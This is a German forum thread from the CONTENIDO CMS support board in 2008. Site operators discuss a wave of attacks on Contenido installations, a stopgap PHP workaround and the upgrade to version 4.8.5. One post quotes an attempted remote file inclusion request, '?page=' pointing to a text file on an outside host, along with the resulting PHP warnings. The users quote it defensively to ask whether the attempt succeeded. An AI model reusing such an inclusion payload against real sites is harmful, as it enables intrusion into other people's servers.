Versuch zu Hacken?

Faar · Beitrag von **Faar** » Mo 16. Jun 2008, 19:25

hier fanden heute Nacht auf ALLEN Contenido Projekten Angriffe statt:

session.inc on line 145
session.inc on line 193

mittels ereg_replace()

Hier würde ich mal

Code: Alles auswählen

if ( $_REQUEST['cfg'] ) { exit; }   // workaround remote hacking exploit

einsetzen so wie in
http://forum.contenido.org/viewtopic.ph ... c&start=15

beschrieben.

Die SQL-Injections kann ich auch nicht so schnell lösen, da dies etwas schwieriger scheint:
http://de.wikipedia.org/wiki/SQL-Injektion

Ansonsten hat Kummer in der ersten Seite hier etwas beschrieben, was er als Abhilfe programmiert hat.

...und ich dachte, es trifft immer nur "die Anderen"

Faar · Beitrag von **Faar** » Mo 16. Jun 2008, 19:27

holger.librenz_4fb hat geschrieben:Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!

Juchhu!

...allen Glücklichen die PHP 5 haben

stsofd · Beitrag von **stsofd** » Mo 16. Jun 2008, 20:16

Faar hat geschrieben: Juchhu!

...allen Glücklichen die PHP 5 haben

Warum???

Ich habe soeben das Update (vorerst nur in der angegriffenen Contenido-Installation) installiert. Da habe ich auch nur PHP 4.x.x
Es läuft (gefühlt) alles ohne Probleme.

DANKE für die schnelle Lösung!!!

Morgen wissen wir, ob es weitere Hack-Angriffe gibt...

Jetzt läuft erstmal der Ball...

Faar · Beitrag von **Faar** » Mo 16. Jun 2008, 20:25

stsofd hat geschrieben: Ich habe soeben das Update (vorerst nur in der angegriffenen Contenido-Installation) installiert. Da habe ich auch nur PHP 4.x.x
Es läuft (gefühlt) alles ohne Probleme.

Jetzt läuft erstmal der Ball...

Super!
Das gibt einem auch das Gefühl, das richtige System gewählt zu haben.
Die Hacker schlafen scheinbar nicht...

...der (Fuß-) Ball rollt aber noch nicht recht

holger.librenz_4fb

Faar hat geschrieben:
holger.librenz_4fb hat geschrieben:Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!
Juchhu!

...allen Glücklichen die PHP 5 haben

Na dann steht doch nach dem nicht so gloreichen, aber gott sei dank gewonnenen deutschen EM Spiel einem doppelten Update nichts im Wege. Keine Angst, PHP 5 beisst nicht

So long,
Holger

tinof · Beitrag von **tinof** » Di 17. Jun 2008, 06:48

Hallo,

ok, also definitiv kein Bugfix mehr für die 4.6.23 ?

Schade, wir hatten das Projekt an dem Tag fertig, an dem die 4.8 herauskam...

Viele Grüße
Tino

holger.librenz_4fb

Doch, die 4.6.x wird noch ein wenig supported. Bugfixes kommen die Tage.

Allerdings ist ein Upgrade definitiv empfehlenswert....

So long,
Holger

Maribeauli · Beitrag von **Maribeauli** » Di 17. Jun 2008, 14:20

holger.librenz_4fb hat geschrieben:Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!

So long,
Holger

Ist nur die Möglichkeit für den Angriff über contenido/b*****d_s****h.php (so wie er bei @faar erfolgte) gefixt oder auch alle anderen 18 Möglichkeiten über die verschiedenen Backend-Dateien ?

holger.librenz_4fb

Es ist mehr gefixed! Eindeutig mehr als "nur" dieses eine File.
Ich würde auch keine Sekunde zögern das Update durchzuführen, da die Lücken leider aktiv ausgenutzt werden...

So long,
Holger

Thorsten G. · Beitrag von **Thorsten G.** » Di 17. Jun 2008, 14:47

--- gelöscht, das war Unsinn ---

Der Hinweis auf nicht zugestellte mails kam eben rein, die mails selbst wurden gestern abend schon versendet.

Faar · Beitrag von **Faar** » Di 17. Jun 2008, 17:46

holger.librenz_4fb hat geschrieben:Es ist mehr gefixed! Eindeutig mehr als "nur" dieses eine File.
Ich würde auch keine Sekunde zögern das Update durchzuführen, da die Lücken leider aktiv ausgenutzt werden...

Ich habe die Besucher-Statistik von einem Projekt durchgesehen und festgestellt, dass sehr zielgerichtet vorgegangen wurde: Alle möglichen Verzeichnisstrukturen die typisch für Contenido sind, wurden ausprobiert und generierten logischerweise meistens eine 404-Fehlerseite.
Dort wo der Pfad dann stimmte, klinkte sich der Hacker ein und versuchte mit verschiedenen Tricks, die php-Dateien zu knacken.

Ein russischer Rechner tat sich besonders in der Besuchsstatistik in der Hackerwelle seit Samstag 14.6. hervor, aber auch ungewöhnlich viele andere Besuche von verschiedenen Seiten/Rechnern fanden in der Zeit statt.
Das "Besuchsaufkommen" lag am WoE bis zum 8-fachen über dem Durchschnitt. Auch der Traffic stieg an, aber zum Glück nicht so weit, dass wir nachzahlen müssten...

Kurzum: da hat jemand Contenido in allen aktuell laufenden Versionen sehr genau studiert und seinen Angriff exakt darauf abgestimmt.
...guckt euch mal euer errorlog.txt an, da stehen sicher viele seltsame Dinge drin

Bei mir/uns läuft nun die aktuelle Version in der jeweiligen Seite und das mit mySQL 4. Fehler gab es bisher keine, nur mehr Speicherplatz wurde benötigt. Das Upgrade lief reibungsfrei per Mausklick

matt.loker · Beitrag von **matt.loker** » Di 17. Jun 2008, 19:59

Mal eine Frage - ist Contenido mit MR genaus gefährdet wie Systeme ohne MR?

yodatortenboxer · Beitrag von **yodatortenboxer** » Di 17. Jun 2008, 20:14

Mal eine Frage - ist Contenido mit MR genaus gefährdet wie Systeme ohne MR?

Würde mich auch einmal interessieren. Ich benutze die 4.8.4 mit dem MR-Plugin und bei mir hat jemand versucht eine Seite mit

Code: Alles auswählen

?page=http://www.joerg-krug.de/docs/vnc/test.txt

dahinter aufzurufen, und da gab es vom MR jede Menge Fehler

Code: Alles auswählen

Warning: parse_url(/?page=http://www.joerg-krug.de/docs/vnc/test.txt) [function.parse-url]: Unable to parse URL in /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php on line 220

Warning: parse_url(/?page=http://www.joerg-krug.de/docs/vnc/test.txt) [function.parse-url]: Unable to parse URL in /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php on line 220

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 479

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 484

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 485

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 486

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 487

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 488

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 489

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/cms/front_content.php on line 211

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/cms/front_content.php on line 928

und scheinbar ist nichts passiert. Keine Ahnung ob das nun ein "einfacher" Hakerangriffversuch war.

Wer weis da genaueres?

Supporter · Beitrag von **Supporter** » Di 17. Jun 2008, 22:00

matt.loker hat geschrieben:Mal eine Frage - ist Contenido mit MR genaus gefährdet wie Systeme ohne MR?

Das ist in der Tat eine gute Frage - Wer hat darauf eine Antwort?

stsofd · Beitrag von **stsofd** » Di 17. Jun 2008, 22:12

Supporter hat geschrieben:...Contenido mit MR

Ich stehe gerade auf dem Schlauch und die Such hat nichts ergeben...

Was bitte bedeutet "MR" ?

Ich kann damit spontan nichts anfangen...

CONTENIDO Forum

Versuch zu Hacken?

Upgrade wegen Hacker